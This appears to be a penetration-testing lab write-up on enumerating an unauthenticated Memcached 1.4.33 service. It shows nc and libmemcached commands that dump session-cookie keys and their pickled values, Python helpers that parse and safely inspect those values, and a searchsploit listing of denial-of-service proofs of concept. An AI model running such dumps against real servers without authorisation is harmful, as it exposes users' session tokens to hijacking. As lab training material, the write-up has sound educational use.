Memcached


Nmap discovered a Memcached service on the target port 11211. The running service is Memcached 1.4.33 (uptime 403 seconds).

Memcached is a general-purpose distributed memory-caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. Memcached is free and open-source software, licensed under the Revised BSD license. Memcached runs on Unix-like operating systems (Linux and macOS) and on Microsoft Windows. It depends on the libevent library.

By default, Memcached allows unauthenticated access, meaning no credentials are required to connect to it. This exposes Memcached servers to potential attacks.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ nmap -p11211 --script=memcached-info $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 11:33 CET
Nmap scan report for 192.168.219.59
Host is up (0.027s latency).
 
PORT      STATE SERVICE
11211/tcp open  memcache
| memcached-info: 
|   Process ID: 536
|   Uptime: 2709 seconds
|   Server time: 2025-03-05T10:33:37
|   Architecture: 64 bit
|   Used CPU (user): 4.040000
|   Used CPU (system): 9.384000
|   Current connections: 1
|   Total connections: 228248
|   Maximum connections: 1024
|   TCP Port: 11211
|   UDP Port: 0
|_  Authentication: no
 
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

An additional Nmap scan with the memcached-info script reveals more information about the service, including that authentication is not enabled.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT pid 536
STAT uptime 2610
STAT time 1741170718
STAT version 1.4.33
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 4.032000
STAT rusage_system 9.372000
STAT curr_connections 2
STAT total_connections 228246
STAT connection_structures 16
STAT reserved_fds 20
STAT cmd_get 13
STAT cmd_set 228236
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 13
STAT get_misses 0
STAT get_expired 0
STAT get_flushed 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 21683217
STAT bytes_written 1831471
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 18
STAT hash_bytes 2097152
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT log_worker_dropped 0
STAT log_worker_written 0
STAT log_watcher_skipped 0
STAT log_watcher_sent 0
STAT bytes 31038328
STAT curr_items 228223
STAT total_items 228236
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END

The above output shows the current traffic statistics. It reports the number of connections, how much data is stored in the cache, and the cache hit ratios. Detailed information on memory usage, and on how items are distributed across the slab allocation used to store them, comes from the slab statistics that follow.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats slabs" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT 3:chunk_size 152
STAT 3:chunks_per_page 6898
STAT 3:total_pages 34
STAT 3:total_chunks 234532
STAT 3:used_chunks 228223
STAT 3:free_chunks 6309
STAT 3:free_chunks_end 0
STAT 3:mem_requested 31038328
STAT 3:get_hits 11
STAT 3:cmd_set 228234
STAT 3:delete_hits 0
STAT 3:incr_hits 0
STAT 3:decr_hits 0
STAT 3:cas_hits 0
STAT 3:cas_badval 0
STAT 3:touch_hits 0
STAT 4:chunk_size 192
STAT 4:chunks_per_page 5461
STAT 4:total_pages 1
STAT 4:total_chunks 5461
STAT 4:used_chunks 0
STAT 4:free_chunks 5461
STAT 4:free_chunks_end 0
STAT 4:mem_requested 0
STAT 4:get_hits 2
STAT 4:cmd_set 2
STAT 4:delete_hits 0
STAT 4:incr_hits 0
STAT 4:decr_hits 0
STAT 4:cas_hits 0
STAT 4:cas_badval 0
STAT 4:touch_hits 0
STAT active_slabs 2
STAT total_malloced 36697376
END

There are 2 active slabs on the server (IDs 3 and 4).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats items" | nc -nv $IP 11211    
(UNKNOWN) [192.168.219.59] 11211 (?) open
STAT items:3:number 228223
STAT items:3:age 2335
STAT items:3:evicted 0
STAT items:3:evicted_nonzero 0
STAT items:3:evicted_time 0
STAT items:3:outofmemory 0
STAT items:3:tailrepairs 0
STAT items:3:reclaimed 0
STAT items:3:expired_unfetched 0
STAT items:3:evicted_unfetched 0
STAT items:3:crawler_reclaimed 0
STAT items:3:crawler_items_checked 0
STAT items:3:lrutail_reflocked 0
END

The above output gives us an insight into how the data is organized in slab ID 3.

Key


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "stats cachedump 3 0" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
ITEM session:ca25c61f-1c88-4cdd-8817-f6ed2c5ccd3d [26 b; 1743848886 s]
ITEM session:b7ac1548-fae2-477e-8097-47cb33fe5a5b [26 b; 1743848886 s]
ITEM session:01f90bfe-64a2-4963-919f-cc51af923b0d [26 b; 1743848886 s]
ITEM session:d43e30af-f22a-4181-b116-9168da3f978c [26 b; 1743848886 s]
 
[...REDACTED...]
 
ITEM session:27577767-89c1-4cfa-b724-2a33e0b40997 [26 b; 1743848846 s]
ITEM session:4db7e490-4321-49b6-88ed-e74beba14002 [26 b; 1743848846 s]
ITEM session:052675bc-0b37-4f41-ae1e-a4f12c8a0ce5 [26 b; 1743848846 s]
ITEM session:8d3ed56b-9912-4ef5-a76a-6ba549b3333c [26 b; 1743848846 s]
ITEM session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4 [26 b; 1743848846 s]
END

Dumping all the keys present in slab ID 3 shows a long list of items. Interestingly, they appear to be session cookies used by the web applications on ports 80 and 5000. Each entry uses the following format:

ITEM <item_key> [<item_size> b; <expiration_timestamp> s]
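The ITEM format can be parsed to summarise a dump instead of reading it by eye. This is an added example, not part of the original notes; the function names are introduced here, the sample lines are copied from the dump above, and the server time is the `STAT time` value from the stats output.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Format documented above: ITEM <item_key> [<item_size> b; <expiration_timestamp> s]
ITEM_RE = re.compile(r"^ITEM (?P<key>\S+) \[(?P<size>\d+) b; (?P<exp>\d+) s\]$")

def parse_cachedump(text):
    """Return (key, size_bytes, expiry_epoch) tuples from `stats cachedump` output."""
    items = []
    for line in text.splitlines():
        m = ITEM_RE.match(line.strip())
        if m:  # skips the nc banner, blank lines and the END terminator
            items.append((m["key"], int(m["size"]), int(m["exp"])))
    return items

def summarise(items, server_time):
    """Group keys by namespace (text before the first ':') and report remaining TTL."""
    namespaces = Counter(key.split(":", 1)[0] for key, _, _ in items)
    ttl_days = sorted({round((exp - server_time) / 86400, 1) for _, _, exp in items})
    latest = max(exp for _, _, exp in items)
    return {
        "namespaces": dict(namespaces),
        "sizes": sorted({size for _, size, _ in items}),
        "ttl_days": ttl_days,
        "latest_expiry_utc": datetime.fromtimestamp(latest, timezone.utc).isoformat(),
    }

# Sample: three ITEM lines copied from the dump above, with the nc banner and END.
SAMPLE = """\
(UNKNOWN) [192.168.219.59] 11211 (?) open
ITEM session:ca25c61f-1c88-4cdd-8817-f6ed2c5ccd3d [26 b; 1743848886 s]
ITEM session:27577767-89c1-4cfa-b724-2a33e0b40997 [26 b; 1743848846 s]
ITEM session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4 [26 b; 1743848846 s]
END
"""
SERVER_TIME = 1741170718  # `STAT time` from the stats output above

if __name__ == "__main__":
    print(summarise(parse_cachedump(SAMPLE), SERVER_TIME))
```

On the sample, every key falls in the `session` namespace, every value is 26 bytes, and the entries expire about 31 days after the server's current time.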

Value


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ echo "get session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4" | nc -nv $IP 11211
(UNKNOWN) [192.168.219.59] 11211 (?) open
VALUE session:ce034b4f-2914-4fc9-ac9d-fcc517a90fe4 0 26
(dp0
V_permanent
p1
I01
s.
END

Reading one of the keys revealed the value stored in it
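The 26-byte value above is a Python pickle (protocol 0). As an added example, not part of the original notes, the following disassembles such a value and decodes it only when the stream is pure data, so content read from an untrusted cache is never passed to `pickle.loads`. The names `inspect_value` and `DataOnlyUnpickler` are introduced here.

```python
import io
import pickle
import pickletools

# Opcodes that import or call objects during loading; plain data never needs them.
CALLING_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
               "NEWOBJ", "NEWOBJ_EX", "BUILD"}

class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses every class or function lookup."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def inspect_value(raw):
    """Disassemble first; decode only when no importing/calling opcode is present."""
    ops = [op.name for op, _arg, _pos in pickletools.genops(raw)]
    flagged = sorted(CALLING_OPS.intersection(ops))
    decoded = None
    if not flagged:
        decoded = DataOnlyUnpickler(io.BytesIO(raw)).load()
    return {"opcodes": ops, "flagged": flagged, "decoded": decoded}

# The value returned by the `get` above, reproduced as bytes (26 bytes).
SESSION_VALUE = b"(dp0\nV_permanent\np1\nI01\ns."

if __name__ == "__main__":
    print(inspect_value(SESSION_VALUE))
```

For the value on this page the result is a one-entry dictionary, `{'_permanent': True}`, with nothing flagged.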

libmemcached-tools


This can be done better using the libmemcached-tools toolset

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ memcstat --servers=$IP   
Server: 192.168.219.59 (11211)
	pid: 536
	uptime: 3328
	time: 1741171436
	version: 1.4.33
	libevent: 2.0.21-stable
	pointer_size: 64
	rusage_user: 4.116000
	rusage_system: 9.404000
	curr_connections: 1
	total_connections: 228258
	connection_structures: 16
	reserved_fds: 20
	cmd_get: 13
	cmd_set: 228236
	cmd_flush: 0
	cmd_touch: 0
	get_hits: 13
	get_misses: 0
	get_expired: 0
	get_flushed: 0
	delete_misses: 0
	delete_hits: 0
	incr_misses: 0
	incr_hits: 0
	decr_misses: 0
	decr_hits: 0
	cas_misses: 0
	cas_hits: 0
	cas_badval: 0
	touch_hits: 0
	touch_misses: 0
	auth_cmds: 0
	auth_errors: 0
	bytes_read: 21683446
	bytes_written: 10229074
	limit_maxbytes: 67108864
	accepting_conns: 1
	listen_disabled_num: 0
	time_in_listen_disabled_us: 0
	threads: 4
	conn_yields: 0
	hash_power_level: 18
	hash_bytes: 2097152
	hash_is_expanding: 0
	malloc_fails: 0
	log_worker_dropped: 0
	log_worker_written: 0
	log_watcher_skipped: 0
	log_watcher_sent: 0
	bytes: 31038328
	curr_items: 228223
	total_items: 228236
	expired_unfetched: 0
	evicted_unfetched: 0
	evictions: 0
	reclaimed: 0
	crawler_reclaimed: 0
	crawler_items_checked: 0
	lrutail_reflocked: 0

Checking the stats

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ memcdump --servers=$IP -f memcdump.txt

Dumping all the keys into the memcdump.txt file

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ cat memcdump.txt | while read line ; do memccat --servers=$IP $line; done > valuedump.txt

Since memccat doesn't support reading keys from a file, a simple while loop will do the job

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ cat valuedump.txt 
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
(dp0
V_permanent
p1
I01
s.
 
[...REDACTED...]

They all contain the same values

Vulnerabilities


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ searchsploit "memcached 1.4.33"
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Memcached 1.4.33 - 'Add' (PoC)                          | linux/dos/40696.py
Memcached 1.4.33 - 'Crash' (PoC)                        | linux/dos/40695.py
Memcached 1.4.33 - 'sasl' (PoC)                         | linux/dos/40697.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Checking the target instance for vulnerabilities with searchsploit reveals 3 exploits, all listed under linux/dos. N/A